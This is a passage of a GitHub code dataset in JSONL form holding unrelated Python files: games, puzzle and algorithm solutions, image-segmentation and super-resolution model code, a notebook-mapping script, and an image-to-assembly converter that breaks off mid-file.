'tower': 1\n }\n discs['disc5'] = {\n 'number': 5,\n 'x': 12,\n 'y': 8,\n 'min_limit_x': -87,\n 'max_limit_x': -53,\n 'min_limit_y': 0,\n 'max_limit_y': 8,\n 'pos_x': discs_position,\n 'pos_y': 0,\n 'tower': 1\n }\n\n\n#adiciona as novas torres e discos\ndef add_towers():\n set_towers_default_values()\n set_discs_default_values()\n set_five_towers_global_values()\n\n towers['t1']['discs'] = [1, 2, 3, 4, 5]\n\n towers['t1']['pos'] = -150\n towers['t2']['pos'] = -75\n towers['t3']['pos'] = 0\n\n towers['t4'] = {\n 'pos': 75,\n 'discs': [] \n }\n towers['t5'] = {\n 'pos': 150,\n 'discs': [] \n }\n\n adjust_towers_position(discs['disc1'], towers['t1']['pos'], 4, 32, 40)\n adjust_towers_position(discs['disc2'], towers['t1']['pos'], 6, 24, 32)\n adjust_towers_position(discs['disc3'], towers['t1']['pos'], 8, 16, 24)\n\n add_new_discs(towers['t1']['pos'])\n\n\n#reinicia o jogo\ndef reset_game():\n global win\n win = False\n set_towers_default_values()\n set_discs_default_values()\n \n\n#função do teclado\ndef keyboard_func(key, x, y):\n if key == b't':\n add_towers()\n elif key == b'r':\n reset_game()\n else:\n return\n draw()\n\n\n#inicialização\ndef init():\n glClearColor(0.8, 0.8, 0.8, 0.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n gluOrtho2D(-100, 100, -100, 100)\n\n\n#funcao main\ndef main():\n set_towers_default_values()\n set_discs_default_values()\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGBA)\n glutInitWindowSize(window_width, window_height)\n glutCreateWindow('Torre de Hanoi')\n glutMouseFunc(on_mouse_click)\n glutKeyboardFunc(keyboard_func)\n glutDisplayFunc(draw)\n init()\n glutMainLoop()\n\n\n#chamada da função main\nmain()\n","repo_name":"moretto1/computaca-grafica","sub_path":"g1/bruno_morettoo_luiz_calazans-cg-t1.py","file_name":"bruno_morettoo_luiz_calazans-cg-t1.py","file_ext":"py","file_size_in_byte":10527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21671233912","text":"#DFS는 최단거리를 찾기 위해 완전 탐색을 하고 그중에서 최솟값을 구하게 되는데, 경로가 무수하게 많을 수 있어 매우 오랜 시간이 소요된다.\n# 실제로 DFS로 풀이 후 제출하면 시간 초과가 난다.\n#반면 BFS는 최단거리를 보장한다. 
이 미로탐색 문제는 모든 경우의 수를 구하지 않고 최단거리만 구하면 되게 때문에 BFS로 풀이한다.\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nN,M= map(int ,input().rstrip().split())\nMap = [list(map(int ,input().rstrip())) for _ in range(N)]\n\ndr=[0,0,-1,1]\ndc=[1,-1,0,0]\n\n\nq=deque()\nsr,sc=0,0\nq.append([sr,sc])\nwhile q:\n r,c=q.popleft()\n for i in range(4):\n cc= c+dc[i]\n rc= r+dr[i]\n if 0<=cc BGR\n img = img.astype(np.float64)\n mean_bgr = np.array([104.00698793, 116.66876762, 122.67891434])\n img -= mean_bgr\n img = img.transpose(2, 0, 1) # HxWxC --> CxHxW\n return img\n\n\ndef split_trn_val(num_train, valid_size=0.2, shuffle=False):\n indices = list(range(num_train))\n if shuffle:\n np.random.shuffle(indices)\n split = int(np.floor(valid_size * num_train))\n trn_indices, val_indices = indices[split:], indices[:split]\n return trn_indices, val_indices\n\n\ndef cross_entropy2d(score, target, weight=None, size_average=True):\n log_p = F.log_softmax(score)\n\n # Flatten the score tensor\n n, c, h, w = score.size()\n log_p = log_p.transpose(1, 2).transpose(2, 3).contiguous().view(-1, c)\n # Remove guesses corresponding to \"unknown\" labels\n # (labels that are less than zero)\n log_p = log_p[target.view(n * h * w, 1).repeat(1, c) >= 0]\n log_p = log_p.view(-1, c)\n\n # Remove \"unknown\" labels (labels that are less than zero)\n # Also, flatten the target tensor\n # TODO: Replace this entire function with nn.functional.cross_entropy\n # with ignore_index set to -1.\n mask = target >= 0\n target = target[mask]\n\n loss = F.nll_loss(log_p, target, weight=weight, size_average=False)\n\n if size_average:\n loss /= mask.data.sum()\n return loss\n\n\ndef scoretensor2mask(scoretensor):\n \"\"\"\n - scoretensor (3D torch tensor) (CxHxW): Each channel contains the scores\n for the corresponding category in the image.\n Returns a numpy array.\n \"\"\"\n _, labels = scoretensor.max(0) # Get labels w/ highest scores\n labels_np = labels.numpy().astype(np.uint8)\n mask = labels_np * 255\n return mask\n\n\ndef detransform_portrait(img, mean=\"voc\"):\n \"\"\"\n - img (torch tensor)\n Returns a numpy array.\n \"\"\"\n if mean == \"voc\":\n mean_bgr = np.array([104.00698793, 116.66876762, 122.67891434])\n else:\n raise ValueError(\"unknown mean\")\n # img = img.numpy().astype(np.float64)\n img = img.transpose((1, 2, 0)) # CxHxW --> HxWxC\n # img *= 255\n img += mean_bgr\n img = img[:, :, ::-1] # BGR -> RGB\n img = img.astype(np.uint8)\n return img\n\n\ndef detransform_mask(mask):\n # mask = mask.numpy()\n mask = mask.astype(np.uint8)\n mask *= 255\n return mask\n\n\ndef mask_image(img, mask, opacity=1.00, bg=False):\n \"\"\"\n - img (PIL)\n - mask (PIL)\n - opacity (float) (default: 1.00)\n Returns a PIL image.\n \"\"\"\n blank = Image.new('RGB', img.size, color=0)\n if bg:\n masked_image = Image.composite(blank, img, mask)\n else:\n masked_image = Image.composite(img, blank, mask)\n if opacity < 1:\n masked_image = Image.blend(img, masked_image, opacity)\n return masked_image\n\n\ndef show_portrait_pred_mask(portrait, preds, mask, start_iteration,\n evaluation_interval,\n opacity=None, bg=False, fig=None):\n \"\"\"\n Args:\n - portrait (torch tensor)\n - preds (list of np.ndarray): list of mask predictions\n - mask (torch tensor)\n A visualization function.\n Returns nothing.\n \"\"\"\n # Gather images\n images = []\n titles = []\n cmaps = []\n\n # ### Prepare portrait\n portrait_pil = Image.fromarray(portrait)\n images.append(portrait)\n titles.append(\"input\")\n cmaps.append(None)\n\n # ### Prepare 
predictions\n for i, pred in enumerate(preds):\n pred_pil = Image.fromarray(pred)\n if opacity:\n pred_pil = mask_image(portrait_pil, pred_pil, opacity, bg)\n images.append(pred_pil)\n titles.append(\"iter. %d\" % (start_iteration + i * evaluation_interval))\n cmaps.append(\"gray\")\n\n # ### Prepare target mask\n if opacity:\n mask_pil = Image.fromarray(mask)\n mask = mask_image(portrait_pil, mask_pil, opacity, bg)\n images.append(mask)\n titles.append(\"target\")\n cmaps.append(\"gray\")\n\n # Show images\n cols = 5\n rows = int(np.ceil(len(images) / cols))\n w = 12\n h = rows * (w / cols + 1)\n figsize = (w, h) # width x height\n plots(images, titles=titles, cmap=cmaps, rows=rows, cols=cols,\n figsize=figsize, fig=fig)\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n\n\ndef get_fnames(d, random=False):\n fnames = [d + f for f in listdir(d) if osp.isfile(osp.join(d, f))]\n print(\"Number of files found in %s: %s\" % (d, len(fnames)))\n if random:\n shuffle(fnames)\n return fnames\n\n\ndef rm_dir_and_ext(filepath):\n return filepath.split('/')[-1].split('.')[-2]\n\n\ndef get_flickr_id(portrait_fname):\n \"\"\"\n Input (string): '../data/portraits/flickr/cropped/portraits/00074.jpg'\n Output (int): 74\n \"\"\"\n return int(rm_dir_and_ext(portrait_fname))\n\n\ndef get_lines(fname):\n '''Read lines, strip, and split.'''\n with open(fname) as f:\n content = f.readlines()\n content = [x.strip().split() for x in content]\n return content\n\n\ndef hist(data, figsize=(6, 3)):\n plt.figure(figsize=figsize)\n plt.hist(data)\n plt.show()\n\n\ndef plot_portraits_and_masks(portraits, masks):\n assert len(portraits) == len(masks)\n fig, axes = plt.subplots(2, 4, figsize=(12, 6))\n fig.tight_layout()\n for i, ax in enumerate(axes.flat):\n if i < 4:\n ax.imshow(portraits[i], interpolation=\"spline16\")\n else:\n mask = gray2rgb(masks[i-4])\n ax.imshow(mask)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.show()\n\n\ndef gray2rgb(gray):\n w, h = gray.shape\n rgb = np.empty((w, h, 3), dtype=np.uint8)\n rgb[:, :, 2] = rgb[:, :, 1] = rgb[:, :, 0] = gray\n return rgb\n\n\ndef plots(imgs, figsize=(12, 12), rows=None, cols=None,\n interp=None, titles=None, cmap='gray',\n fig=None):\n if not isinstance(imgs, list):\n imgs = [imgs]\n imgs = [np.array(img) for img in imgs]\n if not isinstance(cmap, list):\n if imgs[0].ndim == 2:\n cmap = 'gray'\n cmap = [cmap] * len(imgs)\n if not isinstance(interp, list):\n interp = [interp] * len(imgs)\n n = len(imgs)\n if not rows and not cols:\n cols = n\n rows = 1\n elif not rows:\n rows = cols\n elif not cols:\n cols = rows\n if not fig:\n rows = int(np.ceil(len(imgs) / cols))\n w = 12\n h = rows * (w / cols + 1)\n figsize = (w, h)\n fig = plt.figure(figsize=figsize)\n fontsize = 13 if cols == 5 else 16\n fig.set_figheight(figsize[1], forward=True)\n fig.clear()\n for i in range(len(imgs)):\n sp = fig.add_subplot(rows, cols, i+1)\n if titles:\n sp.set_title(titles[i], fontsize=fontsize)\n plt.imshow(imgs[i], interpolation=interp[i], cmap=cmap[i])\n plt.axis('off')\n plt.subplots_adjust(0, 0, 1, 1, .1, 0)\n # plt.tight_layout()\n if fig:\n fig.canvas.draw()\n","repo_name":"MattKleinsmith/portraitseg","sub_path":"portraitseg/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"78"} +{"seq_id":"7949210290","text":"import numpy as np\nimport 
itertools\nimport matplotlib.pyplot as plt\n\ndef win(p1, p2, players):\n # Returns the probaility that p1 wins against p2\n return players[p2] / (players[p1] + players[p2])\n\nclass TournamentTree:\n def __init__(self, players, win_prob):\n self.players = [float(p) for p in players]\n self.win_prob = win_prob\n\n self.init_players = players\n\n def fill_win_prob(self):\n\n # Fill the first column of win proabilities\n for i in range(0, len(self.players), 2):\n a, b = self.players[i], self.players[i+1]\n\n self.win_prob[i][0] = b/(a+b)\n self.win_prob[i+1][0] = a/(a+b)\n\n # Fill the first column of win proabilities\n for i in range(0, len(self.players), 4):\n a, b, c, d = self.players[i], self.players[i+1], \\\n self.players[i+2], self.players[i+3]\n\n self.win_prob[i][1] = self.win_prob[i][0] * (c*d)/(c+d) * (1/(a+c) + 1/(a+d))\n self.win_prob[i+1][1] = self.win_prob[i+1][0] * (c*d)/(c+d) * (1/(b+c) + 1/(b+d))\n self.win_prob[i+2][1] = self.win_prob[i+2][0] * (a*b)/(a+b) * (1/(c+a) + 1/(c+b))\n self.win_prob[i+3][1] = self.win_prob[i+3][0] * (a*b)/(a+b) * (1/(d+a) + 1/(d+b))\n\n # Fill the second column of win proabilities\n for i in range(0, len(self.players), 8):\n\n for j in range(4):\n self.win_prob[i+j][2] = self.win_prob[i+j][1] * ( \\\n self.win_prob[i+4][1] * win(i+j, i+4, self.players) + \\\n self.win_prob[i+5][1] * win(i+j, i+5, self.players) + \\\n self.win_prob[i+6][1] * win(i+j, i+6, self.players) + \\\n self.win_prob[i+7][1] * win(i+j, i+7, self.players) \\\n )\n for j in range(4, 8):\n self.win_prob[i+j][2] = self.win_prob[i+j][1] * ( \\\n self.win_prob[i][1] * win(i+j, i, self.players) + \\\n self.win_prob[i+1][1] * win(i+j, i+1, self.players) + \\\n self.win_prob[i+2][1] * win(i+j, i+2, self.players) + \\\n self.win_prob[i+3][1] * win(i+j, i+3, self.players) \\\n )\n\n def get_win_prob(self, player):\n pos = self.players.index(player)\n\n s = 0\n if pos < 8:\n for i in range(8, 16):\n s += self.win_prob[i][2] * win(pos, i, self.players)\n\n else:\n for i in range(8):\n s += self.win_prob[i][2] * win(pos, i, self.players)\n\n return self.win_prob[pos][2] * s\n\nwin_prob = np.zeros(shape=(16,3))\n\nplayers = [1, 16, 8, 9, 5, 12, 4, 13, 6, 11, 3, 14, 7, 10, 2, 15]\n\ntournament = TournamentTree(players, win_prob)\ntournament.fill_win_prob()\n\n# print(tournament.win_prob)\n# print(np.sum(tournament.win_prob, axis=0))\n\nbase_win = tournament.get_win_prob(2)\nprint('\\nBase winning probability:', base_win)\n\nswaps = []\nfor i, j in itertools.combinations(range(16), 2):\n swap = players.copy()\n swap[i], swap[j] = swap[j], swap[i]\n swaps.append([swap, i, j])\n\nbest_win = base_win\nbest_swap = players\n\n\nswaps_win_prob = []\n\n\nfor s in swaps:\n tournament = TournamentTree(s[0], np.zeros(shape=(16,3)))\n tournament.fill_win_prob()\n cur_win = tournament.get_win_prob(2)\n\n if cur_win > best_win:\n best_win = cur_win\n best_swap = s\n swaps_win_prob.append((str(players[s[1]]) + ' and ' + str(players[s[2]]), cur_win))\n\nprint('We should swap ' + str(players[best_swap[1]]) + ' and ' + str(players[best_swap[2]]))\nprint('Best winning probability for 2-seed:', best_win)\nprint('This leads to an increase in winning chances by', best_win - base_win)\n\nplt.plot([i[0] for i in swaps_win_prob], [i[1] for i in swaps_win_prob])\nplt.xticks(rotation=90, fontsize=6)\nplt.axhline(y=base_win, color='r', 
linestyle='-')\nplt.show()\n","repo_name":"eric-ycw/jane-street-puzzles","sub_path":"04-2021.py","file_name":"04-2021.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18280975738","text":"\nimport tensorflow as tf\n\n\nclass Srresnet:\n \"\"\"Srresnet Model\"\"\"\n\n def __init__(self, training, content_loss='mse', learning_rate=1e-4, num_blocks=16, num_upsamples=2):\n self.learning_rate = learning_rate\n self.num_blocks = num_blocks\n self.num_upsamples = num_upsamples\n self.training = training\n\n if content_loss not in ['mse', 'L1','edge_loss_mse','edge_loss_L1']:\n print('Invalid content loss function. Must be \\'mse\\', or \\'L1_loss\\'.')\n exit()\n self.content_loss = content_loss\n\n\n def _Prelu(self, _x):\n alphas = tf.get_variable('alpha', _x.get_shape()[-1],\\\n initializer=tf.constant_initializer(0.0),\n dtype=tf.float32)\n pos = tf.nn.relu(_x)\n neg = alphas * (_x - abs(_x)) * 0.5\n\n return pos + neg\n\n def ResidualBlock(self, x, kernel_size, filter_size):\n \"\"\"Residual block a la ResNet\"\"\"\n # with tf.variable_scope('sr_edge_net') as scope:\t\t\n weights = {\n 'w1':tf.get_variable(name='w1_redidual',\\\n shape=[kernel_size, kernel_size, filter_size, filter_size], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n 'w2':tf.get_variable(name='w2_residual',\\\n shape=[kernel_size, kernel_size, filter_size, filter_size], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n }\n\n skip = x\n x = tf.nn.conv2d(x, weights['w1'], strides=[1,1,1,1], padding='SAME')\n x = tf.layers.batch_normalization(x, training=self.training)\n x = tf.contrib.keras.layers.PReLU(shared_axes=[1, 2])(x)\n x = tf.nn.conv2d(x, weights['w2'], strides=[1,1,1,1], padding='SAME')\n x = tf.contrib.keras.layers.PReLU(shared_axes=[1, 2])(x)\n x = tf.layers.batch_normalization(x, training=self.training)\n\n x = x + skip\n return x\n\n def Upsample2xBlock(self, x, kernel_size, filter_size):\n weights = {\n 'w1':tf.get_variable(name='w1_upsample',\\\n shape=[kernel_size, kernel_size, 64, filter_size], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n }\n \"\"\"Upsample 2x via SubpixelConv\"\"\"\n print('init',x)\n x = tf.nn.conv2d(x, weights['w1'], strides=[1,1,1,1], padding='SAME')\n print('before',x)\n x = tf.depth_to_space(x, 2)\n print('after',x)\n\n x = tf.contrib.keras.layers.PReLU(shared_axes=[1, 2])(x)\n return x\n\n\n def forward(self, x):\n with tf.variable_scope('srresnet_edge',reuse=tf.AUTO_REUSE) as scope:\n\n weights = {\n 'w_in':tf.get_variable(name='w_in', shape=[9, 9, 3, 64], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n 'w1':tf.get_variable(name='w1', shape=[3, 3, 64, 64], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n 'w_out':tf.get_variable(name='w_out', shape=[9, 9, 64, 3], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n }\n\n # print(x_concate)\n x = tf.nn.conv2d(x, weights['w_in'], strides=[1,1,1,1], padding='SAME')\n x = tf.contrib.keras.layers.PReLU(shared_axes=[1, 2])(x)\n skip = x\n\n for i in range(self.num_blocks):\n x = self.ResidualBlock(x, 3, 64)\n\n x = tf.nn.conv2d(x, weights['w1'], strides=[1,1,1,1], padding='SAME', name='layer_1')\n x = tf.layers.batch_normalization(x, training=self.training)\n x = x + skip\n\n for i in range(self.num_upsamples):\n x = self.Upsample2xBlock(x, kernel_size=3, filter_size=256)\n\n x = tf.nn.conv2d(x, weights['w_out'], 
strides=[1,1,1,1], padding='SAME', name='y_predict')\n\n print(x)\n return x\n\n def _content_loss(self, y, y_pred):\n \"\"\"MSE, VGG22, or VGG54\"\"\"\n if self.content_loss == 'mse':\n return tf.reduce_mean(tf.square(y - y_pred))\n\n if self.content_loss == 'L1':\n return tf.reduce_mean(tf.abs(y - y_pred))\n\n if self.content_loss == 'edge_loss_mse':\n lamd = 0.5\n y_sobeled = tf.image.sobel_edges(y)\n y_pred_sobeled = tf.image.sobel_edges(y_pred)\n return tf.reduce_mean(tf.square(y - y_pred)) + (lamd*tf.reduce_mean(tf.square(y_sobeled - y_pred_sobeled)))\n\n if self.content_loss == 'edge_loss_L1':\n lamd = 0.5\n y_sobeled = tf.image.sobel_edges(y)\n y_pred_sobeled = tf.image.sobel_edges(y_pred)\n return tf.reduce_mean(tf.abs(y - y_pred)) + (lamd*tf.reduce_mean(tf.square(y_sobeled - y_pred_sobeled)))\n\n def loss_function(self, y, y_pred):\n\n # Content loss only\n return self._content_loss(y, y_pred)\n\n def optimize(self, loss):\n # tf.control_dependencies([discrim_train\n # update_ops needs to be here for batch normalization to work\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope='srresnet_edge')\n with tf.control_dependencies(update_ops):\n return tf.train.AdamOptimizer(self.learning_rate).minimize(loss, var_list=tf.get_collection(\n tf.GraphKeys.TRAINABLE_VARIABLES, scope='srresnet_edge'))","repo_name":"benblackcake/srresnet-edge-enhance","sub_path":"srresnet.py","file_name":"srresnet.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37541773862","text":"import json\nimport pandas as pd\nimport argparse \n\n\ndef _open_logs(_path):\n '''\n Quick function to open logs and return a Pandas DataFrame of the job names\n and job ids from the export log.\n\n Parameters: _path STRING the path to be opened\n\n Returns: Pandas DataFrame\n '''\n important_logs = []\n log_dict = {}\n\n with open(_path) as filename:\n f = filename.readlines()\n print(\"READING LOGS ======\")\n\n for i, line in enumerate(f):\n important_logs.append(json.loads(line))\n log_dict.update({important_logs[i]['path']: int(important_logs[i]['object_id'])})\n #print(important_logs[i]['path'], important_logs[i]['object_id'])\n\n return pd.DataFrame(data=list(log_dict.items()), columns=['path', 'object_id'])\n\ndef main(NEW_PATH, OLD_PATH, OLD_URL, NEW_URL, E2_WORKSPACE_ID):\n # Open the old WS logs\n oldPath = OLD_PATH\n newPath = NEW_PATH\n\n old_log_df = _open_logs(oldPath)\n old_log_df['path'] = old_log_df['path'].astype(str)\n print(old_log_df.head())\n\n\n new_log_df = _open_logs(newPath)\n new_log_df['path'] = new_log_df['path'].astype(str)\n print(new_log_df.head())\n new_log_df['path_replaced_archive_with_users'] = new_log_df['path'].str.replace(\"Archive\", \"Users\")\n join_df = pd.merge(old_log_df, new_log_df, \"left\", left_on=\"path\", right_on = \"path_replaced_archive_with_users\", suffixes=(\"_old\", \"_new\"))\n\n #print(join_df.head())\n\n join_df = join_df[['path_old', 'object_id_old', 'object_id_new']]\n join_df['notebook_url_old'] = f\"https://{str(OLD_URL)}/#notebook/\" + join_df['object_id_old'].astype(str)\n join_df['notebook_url_new'] = f\"https://{str(NEW_URL)}/?o={str(E2_WORKSPACE_ID)}#notebook/\" + join_df['object_id_new'].astype(str)\n\n #print(f\"Found {len(old_log_df)} notebooks in ST workspace and {len(new_log_df)} notebooks in E2 workspace.\")\n #print(\"Saving the csv file of all notebook mappings...\")\n join_df.to_csv(\"./all_notebook_mapping.csv\")\n\n\nif 
__name__==\"__main__\":\n parser = argparse.ArgumentParser(description=\"Map notebooks between workspaces.\")\n parser.add_argument(\"--newPath\", \"--NEW\", dest=\"NEW_PATH\", help=\"Path to the new user_workspace.log file.\")\n parser.add_argument(\"--oldPath\", \"--OLD\", dest=\"OLD_PATH\", help=\"Path to the old user_workspace.log file.\")\n\n parser.add_argument(\"--oldURL\", dest=\"OLD_URL\", help=\"Workspace URL of ST workspace.\")\n parser.add_argument(\"--newURL\", dest=\"NEW_URL\", help=\"Workspace URL of E2 workspace.\")\n parser.add_argument(\"--workspace-id\", dest=\"E2_WORKSPACE_ID\", help=\"Workspace ID of E2 workspace.\")\n\n parser = parser.parse_args()\n main(parser.NEW_PATH, parser.OLD_PATH, parser.OLD_URL, parser.NEW_URL, parser.E2_WORKSPACE_ID)","repo_name":"Lovelytics/public-migration-scripts","sub_path":"notebook_script/notebook_ids_mapping.py","file_name":"notebook_ids_mapping.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32547127179","text":"import numpy as np\nimport gensim as gs\nfrom sys import argv\nfrom keras.models import load_model\nimport pandas as pd\nimport re\nfrom keras.preprocessing.sequence import pad_sequences\nimport time\n\nseq_length=40\nencode_dim=100\n\nt1=time.time()\nwith open (argv[1], \"r\") as myfile:\n x_test_temp=myfile.read().splitlines()[1:]\n\nfor x in range(len(x_test_temp)):\n\tptr=0\n\twhile x_test_temp[x][ptr]!=',': ptr+=1\n\tx_test_temp[x]=x_test_temp[x][ptr+1:]\n\ndef elimiate_tripple(s):\n\tif len(s)==0: return \"\"\n\tto_rem=[]\n\tfor x in range(len(s)-1):\n\t\tif s[x]==s[x+1]:\n\t\t\tto_rem.append(x+1)\n\tre=s[0]\n\tfor x in range(1,len(s)):\n\t\tif x not in to_rem:\n\t\t\tre+=s[x]\n\treturn re\n\nfor x in range(len(x_test_temp)):\n\tx_test_temp[x]=re.sub('[^a-zA-z0-9\\s!?.]','',x_test_temp[x]).lower()\n\tx_test_temp[x]=elimiate_tripple(x_test_temp[x])\n\nx_test=[]\nfor line in x_test_temp:\n\tsentence=[]\n\tfor word in line.split():\n\t\tsentence.append(word)\n\tx_test.append(sentence)\nx_test=np.array(x_test)\n\nw2v_model=gs.models.Word2Vec.load('w2v_100_model')\nX=np.zeros((x_test.shape[0],seq_length,encode_dim))\nfor i in range(x_test.shape[0]):\n\tfor j in range(len(x_test[i])):\n\t\tif j>(seq_length-1): break\n\t\tif x_test[i][j] in w2v_model.wv.vocab:\n\t\t\tX[i,j,:]=w2v_model.wv[x_test[i][j]]\n\nprint(time.time()-t1,'seconds used.')\n\nmodel=load_model('1526651381.1485553_5.h5')\nprediction=model.predict(X)\n\nprint('predicting...')\no=open(argv[2],'w')\no.write(\"id,label\\n\")\nfor i in range(prediction.shape[0]):\n if prediction[i][0]<0.5:\n o.write(\"{},{}\\n\".format(i,0))\n else:\n o.write(\"{},{}\\n\".format(i,1))\no.close()\nprint(time.time()-t1,'seconds used.')\n","repo_name":"Andy19961017/ML2018SPRING","sub_path":"hw5/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4099443690","text":"#!/usr/bin/python -t\n\n# dp solution, time O(n^2) space O(n)\n\nclass Solution:\n \"\"\"\n @param A: A list of integers\n @return: A boolean\n \"\"\"\n def canJump(self, A):\n # write your code here\n # state: dp[i], wether we can reach point i\n # function: dp[i] = true if dp[j] == true and A[j] >= i-j, 0<=j= i-j:\n dp[i] = True\n break\n \n return dp[n-1]\n\n\n#greedy O(n)\n\nclass Solution:\n \"\"\"\n @param A: A list of integers\n @return: A boolean\n \"\"\"\n def canJump(self, A):\n 
# write your code here\n n = len(A)\n if n == 0:\n return False\n \n far = A[0]\n \n for i in range(n):\n if i <= far and i+A[i] > far:\n far = i+A[i]\n \n return far >= n-1\n\n#dp O(n2)\n\nclass Solution:\n \"\"\"\n @param A: A list of integers\n @return: A boolean\n \"\"\"\n def canJump(self, A):\n # write your code here\n n = len(A)\n canjump = [False] * n\n canjump[0] = True\n \n for i in range(1, n):\n for j in range(0, i):\n if canjump[j] and j + A[j] >= i:\n canjump[i] = True\n break\n \n return canjump[n-1]\n\n#DP my own solution beat 100%\n#time O(n2), space O(n)\n\nclass Solution:\n \"\"\"\n @param A: A list of integers\n @return: A boolean\n \"\"\"\n def canJump(self, A):\n # write your code here\n n = len(A)\n if n == 0:\n return False\n \n if n == 1:\n return True\n dp = [0] * n\n \n dp[0] = A[0]\n \n for i in range(n-1):\n if dp[i] != 0:\n for j in range(A[i]):\n if i+j > n-1:\n return True\n dp[i+j] = 1 \n else:\n return False\n \n return True\n\n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/0116_jump_game.py","file_name":"0116_jump_game.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"24705222982","text":"n = int(input())\ntemp = n\nn = list(str(n))\nfor i in range(len(n)):\n n[i]=int(n[i])\nc = 0\nfor i in range(len(n)):\n fact = 1\n for j in range(1,n[i]+1):\n fact = fact*j\n n[i]=fact\nif sum(n)==temp:\n print('The number',temp,'is a strong number')\nelse:\n print('The number',temp,'is not a strong number')","repo_name":"Hemanth1502/codemind-python","sub_path":"Strong_Number.py","file_name":"Strong_Number.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8091384790","text":"import sol1\n\nmoves = [ [ 1, 1],\n [ 3, 1],\n [ 5, 1],\n [ 7, 1],\n [ 1, 2]]\n\ntot = 1\nfor moveset in moves:\n horMove = moveset[0]\n verMove = moveset[1]\n rtrees = sol1.sol1func(\"input.txt\",horMove,verMove)\n print(\"Trees for \" + str(horMove) + \" \" + str(verMove) + \": \" + str(rtrees))\n tot *= rtrees\n\nprint(\"Tot: \" + str(tot))","repo_name":"domenicostefani/AdventOfCode2020","sub_path":"day3/sol2.py","file_name":"sol2.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17725622615","text":"#!/usr/bin/env python3\nimport getopt\nimport sys\n\nfrom PIL import Image\n\nimport zxntools as zxn\n\nBITS = 8\nLABEL = \"label\"\nOFFSET = 0\nSKIP = 1\nSIZE = 16\nRAW = 0\nASM = 1\nPGM = 2\nVERSION = \"1.00.00\"\nDATE = \"20210324\"\n\n\ndef my_help(name):\n version()\n sys.stderr.write(\n \"\"\"Usage: {} [] [] []\n\\toptions are\n\\t-a\\t--asm\\t\\toutput assembly code (asm)\n\\t-b\\t--bits\\t\\tset bit depth of palette ({})\n\\t-h\\t--help\\t\\tshow this help message\n\\t-i\\t--in\\t\\tinput file (stdin)\n\\t-l\\t--label\\t\\tlabel in assembly file({})\n\\t-o\\t--out\\t\\toutput file (stdout)\n\\t-O\\t--offset\\toffset (x and y) in image ({})\n\\t-p\\t--pal\\t\\tpalette file (internal)\n\\t-r\\t--raw\\t\\toutput raw binary data (asm)\n\\t-s\\t--sprite\\tgenerate sprites = -b8 -z16\n\\t-S\\t--skip\\t\\tuse every nth pixel ({})\n\\t-V\\t--version\\tget version information\n\\t-v\\t--verbose\\tincrease verbosity\n\\t-z\\t--size\\t\\telement size ({})\n\"\"\".format(name, BITS, LABEL, OFFSET, SKIP, SIZE))\n\n\ndef version():\n sys.stderr.write(\"imagetoasm version {} 
{}\\n\".format(VERSION, DATE))\n zxn.version(True)\n\n\ndef decimate(img, offx, offy, skipx, skipy):\n inx, iny = img.size\n outx = (inx - offx + skipx - 1) // skipx\n outy = (iny - offy + skipy - 1) // skipy\n rv = Image.new('RGB', (outx, outy))\n\n y2 = offy\n for y1 in range(outy):\n x2 = offx\n for x1 in range(outx):\n rv.putpixel((x1, y1), img.getpixel((x2, y2)))\n x2 += skipx\n y2 += skipy\n\n return rv\n\n\ndef writeraw(fd, img, bits, txsz, tysz):\n ixsz, iysz = img.size\n tx = ixsz // txsz\n ty = iysz // tysz\n mask = (1 << bits) - 1\n buf = []\n for tr in range(ty):\n rbase = tr * tysz\n for tc in range(tx):\n cbase = tc * txsz\n for r in range(tysz):\n for c in range(0, txsz, 8 // bits):\n v = 0\n for b in range(8 // bits):\n v = (v << bits) | img.getpixel((c + cbase + b, r + rbase)) & mask\n buf.append(v)\n\n fd.write(bytes(buf))\n\n\ndef writepgm(fd, img, bits, txsz, tysz):\n ixsz, iysz = img.size\n tx = ixsz // txsz\n ty = iysz // tysz\n mask = (1 << bits) - 1\n fd.write(bytes(\"P5\\n{} {}\\n{}\\n\".format(txsz, ixsz * tx, mask), 'ascii'))\n buf = []\n for tr in range(ty):\n rbase = tr * tysz\n for tc in range(tx):\n cbase = tc * txsz\n for r in range(tysz):\n for c in range(0, txsz, 8 // bits):\n for b in range(8 // bits):\n buf.append(img.getpixel((c + cbase + b, r + rbase)) & mask)\n\n fd.write(bytes(buf))\n\n\ndef writeasm(fd, img, bits, label, txsz, tysz):\n ixsz, iysz = img.size\n tx = 